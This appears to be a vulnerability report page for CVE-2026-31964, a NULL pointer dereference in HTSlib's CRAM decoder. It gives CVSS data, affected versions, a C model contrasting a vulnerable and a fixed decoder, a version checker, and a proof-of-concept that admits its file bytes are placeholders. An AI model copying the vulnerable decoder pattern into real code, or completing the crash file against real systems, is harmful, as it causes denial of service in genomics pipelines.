Security Vulnerability Report
CVE-2026-31964 CVSS 7.5 HIGH

Published: 2026-03-18 19:16:05
Last Modified: 2026-03-19 14:50:25

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. While most alignment records store DNA sequence and quality values, the format also allows them to omit this data in certain cases to save space. Due to some quirks of the CRAM format, it is necessary to handle these records carefully as they will actually store data that needs to be consumed and then discarded. Unfortunately the `CONST`, `XPACK` and `XRLE` encodings did not properly implement the interface needed to do this. Trying to decode records with omitted sequence or quality data using these encodings would result in an attempt to write to a NULL pointer. Exploiting this bug causes a NULL pointer dereference. Typically this will cause the program to crash. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.
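To make the "consume and then discard" contract concrete, here is an added model in C. It is an illustration, not htslib code: the `in_block`, `rle_decode_vuln`, `rle_decode_fixed` and `decode_records` names are hypothetical, and the (value, run length) byte-pair encoding is a stand-in for XRLE. It shows both shapes of a data-series decoder: one that assumes an output buffer exists and writes through NULL when asked to skip a record, and one that advances the input cursor without storing anything, so that the records that follow still decode from the right offset.

```c
/*
 * Model of the CRAM "consume and discard" decoder contract.
 * Added illustration, not htslib code: all names here are hypothetical and the
 * encoding is a simplified XRLE-like stream of (value, run_length) byte pairs.
 * A record whose sequence is omitted still has its pairs stored in the block,
 * so they must be read past or every later record decodes from the wrong place.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    const uint8_t *data;   /* encoded data series for one block */
    size_t len;
    size_t pos;            /* read cursor, shared by all records in the block */
} in_block;

/* Returns the number of bytes produced (== want) or -1 if the block is truncated. */
typedef int (*decode_fn)(in_block *in, uint8_t *out, size_t want);

/* Vulnerable shape: assumes out is always a real buffer. When the caller passes
 * NULL to mean "consume but discard", out[n] is a write through a NULL pointer. */
int rle_decode_vuln(in_block *in, uint8_t *out, size_t want)
{
    size_t n = 0;
    while (n < want) {
        if (in->pos + 2 > in->len) return -1;
        uint8_t v = in->data[in->pos], run = in->data[in->pos + 1];
        in->pos += 2;
        for (unsigned i = 0; i < run && n < want; i++)
            out[n++] = v;                      /* NULL pointer write when skipping */
    }
    return (int)n;
}

/* Fixed shape: out == NULL is a supported mode. The input cursor advances
 * exactly as on the normal path, but nothing is stored. */
int rle_decode_fixed(in_block *in, uint8_t *out, size_t want)
{
    size_t n = 0;
    while (n < want) {
        if (in->pos + 2 > in->len) return -1;
        uint8_t v = in->data[in->pos], run = in->data[in->pos + 1];
        in->pos += 2;
        for (unsigned i = 0; i < run && n < want; i++, n++)
            if (out) out[n] = v;
    }
    return (int)n;
}

typedef struct {
    int seq_omitted;   /* the record stores its bases but they are not wanted */
    size_t seq_len;
} record_meta;

/* Decode nrec records in order. Omitted records are still handed to the decoder,
 * with out == NULL, so their stored bytes are consumed. The bases of the last
 * kept record end up in seq (which must hold seq_len bytes).
 * Returns the record count, or -1 on a truncated block. */
int decode_records(in_block *in, const record_meta *recs, size_t nrec,
                   uint8_t *seq, decode_fn dec)
{
    for (size_t r = 0; r < nrec; r++) {
        uint8_t *out = recs[r].seq_omitted ? NULL : seq;
        if (dec(in, out, recs[r].seq_len) < 0) return -1;
    }
    return (int)nrec;
}

int main(void)
{
    /* Constructed block: record 0 = "AAAA" (sequence omitted), record 1 = "CCGG". */
    static const uint8_t stream[] = { 'A', 4, 'C', 2, 'G', 2 };
    const record_meta recs[] = { { 1, 4 }, { 0, 4 } };
    in_block in = { stream, sizeof stream, 0 };
    uint8_t seq[4];

    if (decode_records(&in, recs, 2, seq, rle_decode_fixed) == 2)
        printf("fixed decoder: record 1 = %.4s, cursor at %zu of %zu\n",
               (const char *)seq, in.pos, in.len);
    /* Swapping in rle_decode_vuln here dereferences NULL while skipping record 0. */
    return 0;
}
```

The important detail is that the skip path still moves `in->pos`. An early `if (!out) return 0;` would avoid the crash but leave the stream out of sync, and every later record in the block would decode from the wrong bytes.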

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector (NVD, CVSS 3.1, primary)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Secondary score (CNA, CVSS 4.0)
6.9 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N
Weakness
CWE-476 (NULL Pointer Dereference)

The 3.1 vector rates the crash as a full availability impact (A:H) with no confidentiality or integrity impact; the CNA's 4.0 vector rates it lower (VI:L/VA:L). In both cases the attacker's input is a crafted CRAM file and the outcome is a crash of whichever process decodes it.

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.21.1)
cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE (versions from 1.22 up to, but excluding, 1.22.2)
cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE (fixed in 1.23.1)

Affected ranges:
htslib < 1.21.1
htslib >= 1.22, < 1.22.2
htslib 1.23, < 1.23.1
Fixed in: 1.21.1, 1.22.2, 1.23.1
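The three ranges above are per release branch, so a naive "below 1.23.1" test would misclassify 1.21.1 as vulnerable. As an added check (not from the page or the htslib project), the following C function maps a version string such as the one htslib's `hts_version()` returns onto those ranges. The function names `parse_ver` and `htslib_cve_2026_31964_vulnerable` are hypothetical; the block does not link against htslib.

```c
/*
 * Added example: classify an htslib version string against the NVD ranges for
 * CVE-2026-31964. Not htslib code; function names are hypothetical. In a real
 * tool the string would come from hts_version() (declared in htslib/hts.h).
 */
#include <stdio.h>

/* Parse "MAJOR.MINOR" or "MAJOR.MINOR.PATCH". Returns 0 on success, -1 if the
 * string carries anything else (e.g. "1.23-dirty"), so odd builds are never
 * silently treated as fixed. */
static int parse_ver(const char *s, int *maj, int *min, int *pat)
{
    char tail;
    *pat = 0;
    int n = sscanf(s, "%d.%d.%d%c", maj, min, pat, &tail);
    if (n == 3) return 0;                   /* exactly MAJOR.MINOR.PATCH */
    n = sscanf(s, "%d.%d%c", maj, min, &tail);
    return n == 2 ? 0 : -1;                 /* exactly MAJOR.MINOR */
}

/* Returns 1 if the version falls in an affected range, 0 if it is fixed or not
 * listed as affected, -1 if the string cannot be parsed.
 * Ranges from the NVD configuration: < 1.21.1; 1.22 <= v < 1.22.2; 1.23 <= v < 1.23.1. */
int htslib_cve_2026_31964_vulnerable(const char *version)
{
    int maj, min, pat;
    if (parse_ver(version, &maj, &min, &pat) != 0) return -1;
    if (maj != 1) return maj < 1;           /* 0.x is below 1.21.1; 2.x is not listed */
    if (min < 21) return 1;                 /* everything before 1.21.1 */
    if (min == 21) return pat < 1;          /* 1.21.0 vulnerable, 1.21.1 fixed */
    if (min == 22) return pat < 2;          /* 1.22.0 and 1.22.1 vulnerable */
    if (min == 23) return pat < 1;          /* 1.23.0 vulnerable, 1.23.1 fixed */
    return 0;                               /* 1.24 and later are not listed as affected */
}

int main(int argc, char **argv)
{
    const char *v = argc > 1 ? argv[1] : "1.22.1";   /* constructed default input */
    int r = htslib_cve_2026_31964_vulnerable(v);
    printf("htslib %s: %s\n", v,
           r < 0 ? "unrecognised version string" : r ? "VULNERABLE" : "not affected");
    return r < 0 ? 2 : r;
}
```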

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-31964 PoC - HTSlib CRAM NULL pointer dereference
 *
 * Exercises the NULL pointer write in HTSlib's CRAM decoder that occurs when
 * records with omitted sequence or quality data are decoded through the
 * CONST, XPACK or XRLE encodings.
 *
 * Usage: compile and run against a vulnerable htslib
 * (before 1.21.1, 1.22.x before 1.22.2, or 1.23.0):
 *   gcc -o poc_cve2026_31964 poc_cve2026_31964.c -lhts -lcurl -lz -lbz2 -llzma -lpthread
 *
 * Caveat: create_malicious_cram() only sketches the file. The "container"
 * bytes below are a placeholder, not a valid CRAM container, so htslib will
 * reject the file before the vulnerable decoders run. Triggering the bug
 * requires a container whose SEQ or QUAL data series use CONST, XPACK or
 * XRLE while its records omit sequence or quality data; that encoding is
 * not implemented here.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "htslib/sam.h"   /* htsFile, hts_open, sam_hdr_read, sam_read1, bam1_t */

/* Write the file skeleton: a CRAM 3.1 file definition followed by placeholder container bytes. */
int create_malicious_cram(const char *filename)
{
    FILE *fp = fopen(filename, "wb");
    if (!fp) return -1;

    /* CRAM file definition: 4-byte magic, major, minor, then a 20-byte file id (26 bytes). */
    unsigned char header[26] = {
        'C', 'R', 'A', 'M',  /* magic */
        0x03, 0x01,          /* CRAM version 3.1 */
        /* remaining 20 bytes: file id, left zero-filled */
    };
    fwrite(header, 1, sizeof(header), fp);

    /* Placeholder only. A working PoC needs a properly structured CRAM container
     * here (container header, compression header, slice header, data blocks). */
    unsigned char container[] = {
        0x00, 0x00, 0x00, 0x00, /* container header */
        0xFF, 0xFF, 0xFF, 0xFF, /* block content ID */
        0x02,                   /* placeholder byte; not the CRAM encoding ID of XPACK */
        0x00,                   /* placeholder for the omitted-sequence data series */
        0x00,                   /* placeholder for encoding parameters */
    };
    fwrite(container, 1, sizeof(container), fp);

    fclose(fp);
    return 0;
}

int main(int argc, char **argv)
{
    const char *cram_file = argc > 1 ? argv[1] : "poc.cram";

    if (create_malicious_cram(cram_file) != 0) {
        fprintf(stderr, "Failed to create PoC file\n");
        return 1;
    }
    printf("[*] PoC CRAM file created: %s\n", cram_file);
    printf("[*] Attempting to decode with htslib %s...\n", hts_version());

    /* Open the crafted CRAM file */
    htsFile *fp = hts_open(cram_file, "r");
    if (!fp) {
        fprintf(stderr, "[-] Failed to open CRAM file\n");
        return 1;
    }

    /* Ask the CRAM decoder for the sequence field so the SEQ data series is decoded. */
    if (hts_set_opt(fp, HTS_OPT_REQUIRED_FIELDS,
                    SAM_QNAME | SAM_FLAG | SAM_POS | SAM_SEQ | SAM_MAPQ) < 0) {
        fprintf(stderr, "[-] Failed to set CRAM options\n");
        hts_close(fp);
        return 1;
    }

    /* The header must be read before records; passing a NULL header to sam_read1 is not valid. */
    sam_hdr_t *hdr = sam_hdr_read(fp);
    if (!hdr) {
        fprintf(stderr, "[-] Failed to read CRAM header (file rejected)\n");
        hts_close(fp);
        return 1;
    }

    /* Decoding records is where a vulnerable htslib writes through NULL. */
    bam1_t *aln = bam_init1();
    int ret;
    while ((ret = sam_read1(fp, hdr, aln)) >= 0) {
        /* Process alignment records */
    }

    /* A NULL dereference kills the process inside sam_read1, so reaching this
     * point means the file was rejected (ret < -1) or read to the end (ret == -1). */
    if (ret < -1)
        fprintf(stderr, "[-] sam_read1 returned %d: decode error, file rejected before the bug was reached\n", ret);
    else
        printf("[*] End of file without a crash: htslib is fixed or the file never reached the vulnerable decoders\n");

    bam_destroy1(aln);
    sam_hdr_destroy(hdr);
    hts_close(fp);
    return 0;
}

Raw JSON Data

JSON
{"cve": {
  "id": "CVE-2026-31964",
  "sourceIdentifier": "[email protected]",
  "published": "2026-03-18T19:16:04.633",
  "lastModified": "2026-03-19T14:50:24.563",
  "vulnStatus": "Analyzed",
  "cveTags": [],
  "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. While most alignment records store DNA sequence and quality values, the format also allows them to omit this data in certain cases to save space. Due to some quirks of the CRAM format, it is necessary to handle these records carefully as they will actually store data that needs to be consumed and then discarded. Unfortunately the `CONST`, `XPACK` and `XRLE` encodings did not properly implement the interface needed to do this. Trying to decode records with omitted sequence or quality data using these encodings would result in an attempt to write to a NULL pointer. Exploiting this bug causes a NULL pointer dereference. Typically this will cause the program to crash. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}],
  "metrics": {
    "cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}],
    "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]
  },
  "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}],
  "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
    {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.1", "matchCriteriaId": "A069D6B6-FFF6-4DB7-9811-A568ECC4B288"},
    {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.22", "versionEndExcluding": "1.22.2", "matchCriteriaId": "D9D525C8-C8AD-4368-A39 ... (truncated)